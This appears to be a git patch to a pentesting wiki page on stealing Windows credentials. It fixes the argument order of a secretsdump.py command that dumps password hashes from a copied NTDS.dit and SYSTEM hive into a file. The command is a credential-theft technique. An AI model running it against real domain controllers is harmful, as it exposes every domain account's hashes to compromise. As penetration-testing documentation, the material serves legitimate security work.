From eb3be310d936e3c7ffd6952b8f859c8c247d86a7 Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 22 Dec 2020 11:51:06 +0000 Subject: [PATCH] GitBook: [master] one page modified --- windows/stealing-credentials/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/windows/stealing-credentials/README.md b/windows/stealing-credentials/README.md index 18e9a599..04714d2a 100644 --- a/windows/stealing-credentials/README.md +++ b/windows/stealing-credentials/README.md @@ -225,7 +225,7 @@ You could also use the [**volume shadow copy**](./#stealing-sam-and-system) **** Once you have **obtained** the files **NTDS.dit** and **SYSTEM** you can use tools like _secretsdump.py_ to **extract the hashes**: ```bash -secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile credentials.txt +secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt ``` You can also **extract them automatically** using a valid domain admin user: